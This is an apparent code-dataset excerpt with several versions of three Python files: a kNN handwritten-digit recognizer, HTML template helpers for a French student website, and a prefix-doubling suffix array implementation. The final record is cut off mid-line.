RGB的值选择 白色点 和 目标颜色点的中点的RGB\n \"\"\"\n if R < 185 and G < 100 and B < 100:\n fr.write('1')\n else:\n fr.write('0')\n fr.write('\\n')\n fr.close()\n return fileNameStr\n",
"step-5": "'''\n手写识别系统\n构建识别类\nRecognize\n调用getResult()函数即可\n'''\n\nimport operator\nfrom numpy import *\nfrom PIL import Image\nfrom os import listdir\nfrom io import BytesIO\n\ndef classify(inX, dataSet, labels, k):\n dataSetSize = dataSet.shape[0] #训练数据集的行数\n # 计算距离\n diffMat = tile(inX, (dataSetSize,1)) - dataSet\n sqDiffMat = diffMat**2\n sqDistances = sqDiffMat.sum(axis=1)\n distances = sqDistances**0.5\n # 返还距离排序的索引\n sortedDistIndicies = distances.argsort() \n classCount={} \n for i in range(k):\n voteIlabel = labels[sortedDistIndicies[i]]\n classCount[voteIlabel] = classCount.get(voteIlabel,0) + 1\n sortedClassCount = sorted(classCount.items(), \n key=operator.itemgetter(1), reverse=True)\n \n return sortedClassCount[0][0]\n\n# 将图片转化为行向量\ndef img2vector(filename):\n returnVect = zeros((1,1024))\n fr = open(filename)\n for i in range(32):\n lineStr = fr.readline()\n for j in range(32):\n returnVect[0,32*i+j] = int(lineStr[j])\n return returnVect\n\n'''\n如何让加载训练集值运行一次?\n'''\nhwLabels , trainingMat = [] , []\n\ndef loadTrainingSet(dir_trainingSet):\n \n print('把trainingDigits文件夹里的所有训练集导入')\n #把trainingDigits文件夹里的所有训练集导入\n trainingFileList = listdir(dir_trainingSet)\n #print(trainingFileList)\n m = len(trainingFileList)\n trainingMat = zeros((m,1024)) # 初始化训练矩阵\n for i in range(m):\n # 此三步,将所有训练集的名称分割只取出第一个\n fileNameStr = trainingFileList[i]\n fileStr = fileNameStr.split('.')[0]\n classNumStr = int(fileStr.split('_')[0])\n \n # 得到一个由训练集 名称首个number的矩阵\n hwLabels.append(classNumStr)\n \n # 每一个 训练集的 txt 都转成一个 1行1025列的向量\n trainingMat[i,:] = img2vector(dir_trainingSet+'/%s' % fileNameStr)\n\n return hwLabels , trainingMat\n\n\ndef getResult(filename,trainingDigits):\n '''\n filename 测试集dir\n trainingDigits 训练集dir\n '''\n hwLabels , trainingMat = loadTrainingSet(trainingDigits)\n \n # 为输入的数字图片分类,读取图片为\n with open(filename, 'rb') as f:\n filePath = f.read()\n # 此时 filePath 是十六进制字节 如: \\x7f\\x12\\xdf\n fileNameStr = changeImg2Text(filePath,filename)\n inputVect = img2vector(fileNameStr)\n \n classifierResult = classify(inputVect, trainingMat, hwLabels, 3)\n print( '预测手写数字识别为:',classifierResult)\n return classifierResult\n \n # 原demo里有这句话,可以这句话,会将预测的图片失效,暂注释 保留\n #with open(filename, 'w') as f:\n # f.write(str(classifierResult))\n\n# 处理初始图形\ndef changeImg2Text(filePath,filename):\n # 就是字符串 \\ 分割后(其中 \\\\ 是加了转译),取最后一个 2.jpg,再 以 . 分割取 名字\n fileNameStr = filename.split('\\\\')[-1].split('.')[0] + '.txt'\n fr = open(fileNameStr, 'w')\n \n #读图片转矩阵,Python 3 要加 BytesIO(filePath)\n '''\n https://codedump.io/share/aztOtkSsnO2U/1/python-valueerror-embedded-null-byte-when-reading-png-file-from-bash-pipe\n '''\n im = Image.open(BytesIO(filePath))\n #print(im) # <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=206x376 at 0x8D99C50>\n im2 = im.resize((32, 32), Image.ANTIALIAS)\n img = array(im2)\n print( img.shape , Image.ANTIALIAS )\n \n m, n = img.shape[:2]\n\n for i in range(m):\n for j in range(n):\n R, G, B = img[i, j, :]\n # 因为,图片首先要 处理成灰度图,所以根据,灰度进而识别\n '''\n 这部分的颜色用 PhotoShop 取色器,调参。\n RGB的值选择 白色点 和 目标颜色点的中点的RGB\n '''\n #if R < 40 and G < 40 and B < 40: # 这些参数时对于黑白色的区分\n #if R < 245 and G < 153 and B < 120: # 对 0 文件里,橙色图片的划分\n if R < 185 and G < 100 and B < 100: # 对 2 文件里,灰色图片的划分\n fr.write('1')\n else:\n fr.write('0')\n fr.write('\\n')\n\n fr.close()\n return fileNameStr\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
def entete():
entete='''
<!DOCTYPE HTML>
<html lang=“fr”>
<head>
<title>AMAP'PATATE</title>
<meta charset="UTF-8" />
<link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/font-awesome.min.css" />
<link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/bootstrap.min.css" />
<link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/style.css" />
<link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/menu.css" />
<link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/form.css" />
<link rel="stylesheet" type="text/css" href="/IENAC15/amapatate/css/button.css" />
<script type="text/javascript" src= " /IENAC15/amapatate/js/jquery-2.2.0.min.js" ></script>
<script type="text/javascript" src= " /IENAC15/amapatate/js/bootstrap.min.js" ></script>
</head>
<body>
'''
return entete
def nav():
nav='''
<nav>
<ul>
<li><a href="/IENAC15/amapatate/index.py">
<span class="fa-stack fa-lg">
<i class="fa fa-circle fa-stack-2x"></i>
<i class="fa fa-home fa-stack-1x fa-inverse"></i>
</span>
Accueil</a>
</li>
<li><a href="/IENAC15/amapatate/index.py#ecole">
<span class="fa-stack fa-lg">
<i class="fa fa-circle fa-stack-2x"></i>
<i class="fa fa-plane fa-stack-1x fa-inverse"></i>
</span>
L'école</a>
<ul>
<li><a href="http://www.eag-tournament.com">
<i class="fa fa-soccer-ball-o fa-fw"></i>EAG</a>
</li>
<li><a href="index.html#contacter">
<i class="fa fa-phone fa-fw"></i>Nous Contacter</a>
</li>
</ul>
</li>
<li><a href="/IENAC15/amapatate/python/clubs.py">
<span class="fa-stack fa-lg">
<i class="fa fa-circle fa-stack-2x"></i>
<i class="fa fa-bicycle fa-stack-1x fa-inverse"></i>
</span>
Les clubs</a>
</li>
<li><a href="/IENAC15/amapatate/python/connecter.py">
<span class="fa-stack fa-lg">
<i class="fa fa-circle fa-stack-2x"></i>
<i class="fa fa-user fa-stack-1x fa-inverse"></i>
</span>
Se connecter</a>
</li>
'''
if "nom" in Session() and Session()["nom"]!='':
nav+='''
<li><a href="/IENAC15/amapatate/python/page_prive.py">
<span class="fa-stack fa-lg">
<i class="fa fa-circle fa-stack-2x"></i>
<i class="fa fa-user fa-stack-1x fa-inverse"></i>
</span>
Page privée</a>
</li>
'''
nav+='''
</ul>
</nav>
'''
return nav
def titre(intitule):
titre='''
<header>
<h1>'''+intitule+'''</h1>
<p>L'AMAP fruits et légumes qui vous donne la patate </p>
</header>
'''
return titre
def footer():
footer='''
<footer>© All right reserved ENAC
</footer>
</body>
</html>
'''
return footer
|
normal
|
{
"blob_id": "933758002c5851a2655ed4c51b2bed0102165116",
"index": 4742,
"step-1": "def entete():\n entete = \"\"\"\n <!DOCTYPE HTML>\n<html lang=“fr”>\n <head>\n <title>AMAP'PATATE</title>\n <meta charset=\"UTF-8\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/font-awesome.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/bootstrap.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/style.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/menu.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/form.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/button.css\" />\n <script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/jquery-2.2.0.min.js\" ></script>\n\t\t\t\t\t<script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/bootstrap.min.js\" ></script>\n </head>\n <body>\n\n \"\"\"\n return entete\n\n\n<mask token>\n",
"step-2": "def entete():\n entete = \"\"\"\n <!DOCTYPE HTML>\n<html lang=“fr”>\n <head>\n <title>AMAP'PATATE</title>\n <meta charset=\"UTF-8\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/font-awesome.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/bootstrap.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/style.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/menu.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/form.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/button.css\" />\n <script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/jquery-2.2.0.min.js\" ></script>\n\t\t\t\t\t<script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/bootstrap.min.js\" ></script>\n </head>\n <body>\n\n \"\"\"\n return entete\n\n\n<mask token>\n\n\ndef footer():\n footer = \"\"\"\n <footer>© All right reserved ENAC\n </footer>\n </body>\n </html>\n \"\"\"\n return footer\n",
"step-3": "def entete():\n entete = \"\"\"\n <!DOCTYPE HTML>\n<html lang=“fr”>\n <head>\n <title>AMAP'PATATE</title>\n <meta charset=\"UTF-8\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/font-awesome.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/bootstrap.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/style.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/menu.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/form.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/button.css\" />\n <script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/jquery-2.2.0.min.js\" ></script>\n\t\t\t\t\t<script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/bootstrap.min.js\" ></script>\n </head>\n <body>\n\n \"\"\"\n return entete\n\n\n<mask token>\n\n\ndef titre(intitule):\n titre = \"\"\"\n <header>\n <h1>\"\"\" + intitule + \"\"\"</h1>\n <p>L'AMAP fruits et légumes qui vous donne la patate </p>\n </header>\n \"\"\"\n return titre\n\n\ndef footer():\n footer = \"\"\"\n <footer>© All right reserved ENAC\n </footer>\n </body>\n </html>\n \"\"\"\n return footer\n",
"step-4": "def entete():\n entete = \"\"\"\n <!DOCTYPE HTML>\n<html lang=“fr”>\n <head>\n <title>AMAP'PATATE</title>\n <meta charset=\"UTF-8\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/font-awesome.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/bootstrap.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/style.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/menu.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/form.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/button.css\" />\n <script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/jquery-2.2.0.min.js\" ></script>\n\t\t\t\t\t<script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/bootstrap.min.js\" ></script>\n </head>\n <body>\n\n \"\"\"\n return entete\n\n\ndef nav():\n nav = \"\"\"\n <nav>\n <ul>\n\t <li><a href=\"/IENAC15/amapatate/index.py\">\n\t \t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-home fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t \tAccueil</a>\n\t </li>\n <li><a href=\"/IENAC15/amapatate/index.py#ecole\">\n <span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-plane fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n L'école</a>\n \t<ul>\n \t\t\t<li><a href=\"http://www.eag-tournament.com\">\n \t\t\t <i class=\"fa fa-soccer-ball-o fa-fw\"></i>EAG</a>\n \t\t\t</li>\n \t\t\t<li><a href=\"index.html#contacter\">\n \t\t\t\t<i class=\"fa fa-phone fa-fw\"></i>Nous Contacter</a>\n \t\t\t</li>\n \t\t\t</ul>\n </li>\n\t\t \t<li><a href=\"/IENAC15/amapatate/python/clubs.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-bicycle fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t\t \t\tLes clubs</a>\n\t\t \t</li>\n\t\t \t<li><a href=\"/IENAC15/amapatate/python/connecter.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-user fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t\t \tSe connecter</a>\n\t\t \t</li>\n\t\t \t\"\"\"\n if 'nom' in Session() and Session()['nom'] != '':\n nav += \"\"\"\n <li><a href=\"/IENAC15/amapatate/python/page_prive.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-user fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t\t \tPage privée</a>\n\t\t \t</li>\n\t\t \t\"\"\"\n nav += \"\"\"\n \t\t\t</ul>\n </nav>\n \"\"\"\n return nav\n\n\ndef titre(intitule):\n titre = \"\"\"\n <header>\n <h1>\"\"\" + intitule + \"\"\"</h1>\n <p>L'AMAP fruits et légumes qui vous donne la patate </p>\n </header>\n \"\"\"\n return titre\n\n\ndef footer():\n footer = \"\"\"\n <footer>© All right reserved ENAC\n </footer>\n </body>\n </html>\n \"\"\"\n return footer\n",
"step-5": "def entete():\n entete='''\n <!DOCTYPE HTML>\n<html lang=“fr”>\n <head>\n <title>AMAP'PATATE</title>\n <meta charset=\"UTF-8\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/font-awesome.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/bootstrap.min.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/style.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/menu.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/form.css\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"/IENAC15/amapatate/css/button.css\" />\n <script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/jquery-2.2.0.min.js\" ></script>\n\t\t\t\t\t<script type=\"text/javascript\" src= \" /IENAC15/amapatate/js/bootstrap.min.js\" ></script>\n </head>\n <body>\n\n '''\n return entete\n\ndef nav():\n nav='''\n <nav>\n <ul>\n\t <li><a href=\"/IENAC15/amapatate/index.py\">\n\t \t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-home fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t \tAccueil</a>\n\t </li>\n <li><a href=\"/IENAC15/amapatate/index.py#ecole\">\n <span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-plane fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n L'école</a>\n \t<ul>\n \t\t\t<li><a href=\"http://www.eag-tournament.com\">\n \t\t\t <i class=\"fa fa-soccer-ball-o fa-fw\"></i>EAG</a>\n \t\t\t</li>\n \t\t\t<li><a href=\"index.html#contacter\">\n \t\t\t\t<i class=\"fa fa-phone fa-fw\"></i>Nous Contacter</a>\n \t\t\t</li>\n \t\t\t</ul>\n </li>\n\t\t \t<li><a href=\"/IENAC15/amapatate/python/clubs.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-bicycle fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t\t \t\tLes clubs</a>\n\t\t \t</li>\n\t\t \t<li><a href=\"/IENAC15/amapatate/python/connecter.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-user fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t\t \tSe connecter</a>\n\t\t \t</li>\n\t\t \t'''\n if \"nom\" in Session() and Session()[\"nom\"]!='':\n nav+='''\n <li><a href=\"/IENAC15/amapatate/python/page_prive.py\">\n\t\t \t\t<span class=\"fa-stack fa-lg\">\n \t \t\t\t<i class=\"fa fa-circle fa-stack-2x\"></i>\n \t \t\t\t<i class=\"fa fa-user fa-stack-1x fa-inverse\"></i>\n \t \t\t</span>\n\t\t \tPage privée</a>\n\t\t \t</li>\n\t\t \t'''\n nav+='''\n \t\t\t</ul>\n </nav>\n '''\n return nav\n\ndef titre(intitule):\n titre='''\n <header>\n <h1>'''+intitule+'''</h1>\n <p>L'AMAP fruits et légumes qui vous donne la patate </p>\n </header>\n '''\n return titre\n\ndef footer():\n footer='''\n <footer>© All right reserved ENAC\n </footer>\n </body>\n </html>\n '''\n return footer\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def prefix_doubling_suffix_array(n):
n_len = len(n)
if n_len == 0:
return []
if n_len == 1:
return [0]
suffixes = []
for i in range(n_len):
suffixes.append((i, {}))
suffixes[i][1]['suffix'] = n[i:]
suffixes[i][1]['current_rank'] = ord(suffixes[i][1]['suffix'][0])
if len(suffixes[i][1]['suffix']) > 1:
suffixes[i][1]['next_rank'] = ord(suffixes[i][1]['suffix'][1])
else:
suffixes[i][1]['next_rank'] = -1
suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[1][
'next_rank']))
k = 4
for k in range(4, 2 * n_len, 2 * k):
prev_rank_pair = str(suffixes[0][1]['current_rank']) + str(suffixes
[0][1]['next_rank'])
suffixes[0][1]['current_rank'] = 0
curr_rank_ht = {}
curr_rank_ht[suffixes[0][1]['suffix']] = 0
for i in range(1, len(suffixes)):
current_rank_pair = str(suffixes[i][1]['current_rank']) + str(
suffixes[i][1]['next_rank'])
if current_rank_pair == prev_rank_pair:
suffixes[i][1]['current_rank'] = suffixes[i - 1][1][
'current_rank']
else:
suffixes[i][1]['current_rank'] = suffixes[i - 1][1][
'current_rank'] + 1
prev_rank_pair = current_rank_pair
curr_rank_ht[suffixes[i][1]['suffix']] = suffixes[i][1][
'current_rank']
for i in range(len(suffixes)):
sub_suffix = suffixes[i][1]['suffix'][k // 2:]
if sub_suffix in curr_rank_ht:
suffixes[i][1]['next_rank'] = curr_rank_ht[sub_suffix]
else:
suffixes[i][1]['next_rank'] = -1
suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[
1]['next_rank']))
suffix_array = []
for i in suffixes:
suffix_array.append(i[0])
return suffix_array
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def prefix_doubling_suffix_array(n):
n_len = len(n)
if n_len == 0:
return []
if n_len == 1:
return [0]
suffixes = []
for i in range(n_len):
suffixes.append((i, {}))
suffixes[i][1]['suffix'] = n[i:]
suffixes[i][1]['current_rank'] = ord(suffixes[i][1]['suffix'][0])
if len(suffixes[i][1]['suffix']) > 1:
suffixes[i][1]['next_rank'] = ord(suffixes[i][1]['suffix'][1])
else:
suffixes[i][1]['next_rank'] = -1
suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[1][
'next_rank']))
k = 4
for k in range(4, 2 * n_len, 2 * k):
prev_rank_pair = str(suffixes[0][1]['current_rank']) + str(suffixes
[0][1]['next_rank'])
suffixes[0][1]['current_rank'] = 0
curr_rank_ht = {}
curr_rank_ht[suffixes[0][1]['suffix']] = 0
for i in range(1, len(suffixes)):
current_rank_pair = str(suffixes[i][1]['current_rank']) + str(
suffixes[i][1]['next_rank'])
if current_rank_pair == prev_rank_pair:
suffixes[i][1]['current_rank'] = suffixes[i - 1][1][
'current_rank']
else:
suffixes[i][1]['current_rank'] = suffixes[i - 1][1][
'current_rank'] + 1
prev_rank_pair = current_rank_pair
curr_rank_ht[suffixes[i][1]['suffix']] = suffixes[i][1][
'current_rank']
for i in range(len(suffixes)):
sub_suffix = suffixes[i][1]['suffix'][k // 2:]
if sub_suffix in curr_rank_ht:
suffixes[i][1]['next_rank'] = curr_rank_ht[sub_suffix]
else:
suffixes[i][1]['next_rank'] = -1
suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[
1]['next_rank']))
suffix_array = []
for i in suffixes:
suffix_array.append(i[0])
return suffix_array
<|reserved_special_token_0|>
print(suffix_array)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def prefix_doubling_suffix_array(n):
n_len = len(n)
if n_len == 0:
return []
if n_len == 1:
return [0]
suffixes = []
for i in range(n_len):
suffixes.append((i, {}))
suffixes[i][1]['suffix'] = n[i:]
suffixes[i][1]['current_rank'] = ord(suffixes[i][1]['suffix'][0])
if len(suffixes[i][1]['suffix']) > 1:
suffixes[i][1]['next_rank'] = ord(suffixes[i][1]['suffix'][1])
else:
suffixes[i][1]['next_rank'] = -1
suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[1][
'next_rank']))
k = 4
for k in range(4, 2 * n_len, 2 * k):
prev_rank_pair = str(suffixes[0][1]['current_rank']) + str(suffixes
[0][1]['next_rank'])
suffixes[0][1]['current_rank'] = 0
curr_rank_ht = {}
curr_rank_ht[suffixes[0][1]['suffix']] = 0
for i in range(1, len(suffixes)):
current_rank_pair = str(suffixes[i][1]['current_rank']) + str(
suffixes[i][1]['next_rank'])
if current_rank_pair == prev_rank_pair:
suffixes[i][1]['current_rank'] = suffixes[i - 1][1][
'current_rank']
else:
suffixes[i][1]['current_rank'] = suffixes[i - 1][1][
'current_rank'] + 1
prev_rank_pair = current_rank_pair
curr_rank_ht[suffixes[i][1]['suffix']] = suffixes[i][1][
'current_rank']
for i in range(len(suffixes)):
sub_suffix = suffixes[i][1]['suffix'][k // 2:]
if sub_suffix in curr_rank_ht:
suffixes[i][1]['next_rank'] = curr_rank_ht[sub_suffix]
else:
suffixes[i][1]['next_rank'] = -1
suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[
1]['next_rank']))
suffix_array = []
for i in suffixes:
suffix_array.append(i[0])
return suffix_array
n = 'banana'
suffix_array = prefix_doubling_suffix_array(n)
print(suffix_array)
<|reserved_special_token_1|>
"""
Suffix Arrays - Optimized O(n log n) - prefix doubling
A suffix is a non-empty substring at the end of the string. A suffix array
contains all the sorted suffixes of a string
A suffix array provides a space efficient alternative to a suffix tree which
itself is a compressed version of a trie. Suffix array can do something a suffix
tree can, with some additional information such as Longest Common Prefix (LCP)
array.
A suffix array can be constructed from Suffix tree by doing a DFS traversal of
the suffix tree. In fact Suffix array and suffix tree both can be constructed
from each other in linear time.
Advantages of suffix arrays over suffix trees include improved space
requirements, simpler linear time construction algorithms (e.g., compared to
Ukkonen’s algorithm) and improved cache locality
source: https://www.geeksforgeeks.org/suffix-array-set-2-a-nlognlogn-algorithm/
# Algorithm
1. The first step is to generate all the suffix starting with the whole string
and then looping through and producing the 1 to end, 2 to end etc until the
end character.
2. We assign current and next rank to the first two characters of the suffixes.
A simple rank could be str[i]-'a'. If no characters are found, set it to -1
Index Suffix Rank Next Rank
0 banana 1 0
1 anana 0 13
2 nana 13 0
3 ana 0 13
4 na 13 0
5 a 0 -1
3. Sort the array using the current and next rank
Index Suffix Rank Next Rank
5 a 0 -1
1 anana 0 13
3 ana 0 13
0 banana 1 0
2 nana 13 0
4 na 13 0
4. So far we sorted all the suffixes through first two characters. Now we do the
next 4, 8 and so on until 2*len(n) times. We loop from 4 to 2N and
calculate the current and next rank the following way.
a. Current Rank - Assign 0 as the current rank for the first suffix. For
remaining suffixes, we take the rank pair from previous iteration i.e
(current rank, next rank) from the previous time and see if it's the
same as the rank pair of the previous suffix. If they are the same, set
current rank to same as previous suffix current rank, else increment by
1 and set it as current rank for the current suffix.
Index Suffix Rank
5 a 0 [Assign 0 to first]
1 anana 1 (0, 13) is different from previous
3 ana 1 (0, 13) is same as previous
0 banana 2 (1, 0) is different from previous
2 nana 3 (13, 0) is different from previous
4 na 3 (13, 0) is same as previous
b. Next Rank - suppose k is the loop and the initial value is 4, we take
the subarray from k/2 to end and see what current rank is assigned for
that suffix (i.e. suffix[k/2:].current_rank) and set that rank. If no
suffix is found or theres no characters for k/2 to end, set it to -1
Index Suffix Rank Next Rank
5 a 0 -1
1 anana 1 1
3 ana 1 0
0 banana 2 3
2 nana 3 3
4 na 3 -1
5. Now sort current and next rank
6. Proceed like this until k <= 2N
"""
def prefix_doubling_suffix_array(n):
n_len = len(n)
# base cases
if n_len == 0:
return []
if n_len == 1:
return [0]
# declare suffixes dictionary which will hold all the suffixes in the sorted
# order eventually and also a current and next rank attribute to help with
# sorting
# suffixes = {
# 0: {
# "suffix": "banana",
# "current_rank": None,
# "next_rank": None
# },
# 1: {..}
# }
suffixes = []
# generate all suffixes for n and set current rank for first character and
# next rank for second character
for i in range(n_len):
suffixes.append((i, {}))
suffixes[i][1]["suffix"] = n[i:]
suffixes[i][1]["current_rank"] = ord(suffixes[i][1]["suffix"][0])
if len(suffixes[i][1]["suffix"]) > 1:
suffixes[i][1]["next_rank"] = ord(suffixes[i][1]["suffix"][1])
else:
suffixes[i][1]["next_rank"] = -1
# sort the suffixes by the first two characters i.e. current and next rank.
# Leverage the sorted() with custom key to sort the tuples by current/next
# rank. Sorted returns a list of tuples.
suffixes = sorted(suffixes, key=lambda x: (x[1]["current_rank"], x[1]["next_rank"]))
# Now that first two characters are sorted, calculate current/next rank and
# sort first 4, 8.. etc characters until 2*n
k = 4
for k in range(4, 2 * n_len, 2 * k):
# store previous rank pair to use it to set the current rank
prev_rank_pair = str(suffixes[0][1]["current_rank"]) + str(suffixes[0][1]["next_rank"])
# set current rank of first suffix to 0
suffixes[0][1]["current_rank"] = 0
# To make the lookup easier for getting the current rank of a suffix
# to be able to set it as the next rank, maintain a hash table with
# suffix as the key and current rank as the value
curr_rank_ht = {}
curr_rank_ht[suffixes[0][1]["suffix"]] = 0
# Loop through suffix array and set the current rank based on current
# rank pair/previous rank pair comparison.
for i in range(1, len(suffixes)):
current_rank_pair = str(suffixes[i][1]["current_rank"]) + str(suffixes[i][1]["next_rank"])
# if current and previous are same rank pairs, set current rank of
# the current suffix to current rank of previous suffix
if current_rank_pair == prev_rank_pair:
suffixes[i][1]["current_rank"] = suffixes[i-1][1]["current_rank"]
# else add 1 to the current rank of previous suffix and set it as
# current rank of current suffix.
else:
suffixes[i][1]["current_rank"] = suffixes[i-1][1]["current_rank"] + 1
# set previous rank pair to the current rank pair for the next
# iteration check.
prev_rank_pair = current_rank_pair
curr_rank_ht[suffixes[i][1]["suffix"]] = suffixes[i][1]["current_rank"]
# Loop through suffix array and set the next rank based on the current
# rank of suffix[k/2:] and if no such suffix exists set it to -1
for i in range(len(suffixes)):
sub_suffix = suffixes[i][1]["suffix"][k//2:]
if sub_suffix in curr_rank_ht:
suffixes[i][1]["next_rank"] = curr_rank_ht[sub_suffix]
else:
suffixes[i][1]["next_rank"] = -1
# Now that we have set both current and next rank, sort the suffix array
# using those two values
suffixes = sorted(suffixes, key=lambda x: (x[1]["current_rank"], x[1]["next_rank"]))
suffix_array = []
for i in suffixes:
suffix_array.append(i[0])
# print(i[1]["suffix"])
return suffix_array
n = "banana"
suffix_array = prefix_doubling_suffix_array(n)
print(suffix_array)
|
flexible
|
{
"blob_id": "5a2106f5255493d2f6c8cb9e06a2666c8c55ed38",
"index": 3852,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef prefix_doubling_suffix_array(n):\n n_len = len(n)\n if n_len == 0:\n return []\n if n_len == 1:\n return [0]\n suffixes = []\n for i in range(n_len):\n suffixes.append((i, {}))\n suffixes[i][1]['suffix'] = n[i:]\n suffixes[i][1]['current_rank'] = ord(suffixes[i][1]['suffix'][0])\n if len(suffixes[i][1]['suffix']) > 1:\n suffixes[i][1]['next_rank'] = ord(suffixes[i][1]['suffix'][1])\n else:\n suffixes[i][1]['next_rank'] = -1\n suffixes = sorted(suffixes, key=lambda x: (x[1]['current_rank'], x[1][\n 'next_rank']))\n k = 4\n for k in range(4, 2 * n_len, 2 * k):\n prev_rank_pair = str(suffixes[0][1]['current_rank']) + str(suffixes\n [0][1]['next_rank'])\n suffixes[0][1]['current_rank'] = 0\n curr_rank_ht = {}\n curr_rank_ht[suffixes[0][1]['suffix']] = 0\n for i in range(1, len(suffixes)):\n current_rank_pair = str(suffixes[i][1]['current_rank']) + str(\n suffixes[i][1]['next_rank'])\n if current_rank_pair == prev_rank_pair:\n suffixes[i][1]['current_rank'] = suffixes[i - 1][1][\n 'current_rank']\n else:\n suffixes[i][1]['current_rank'] 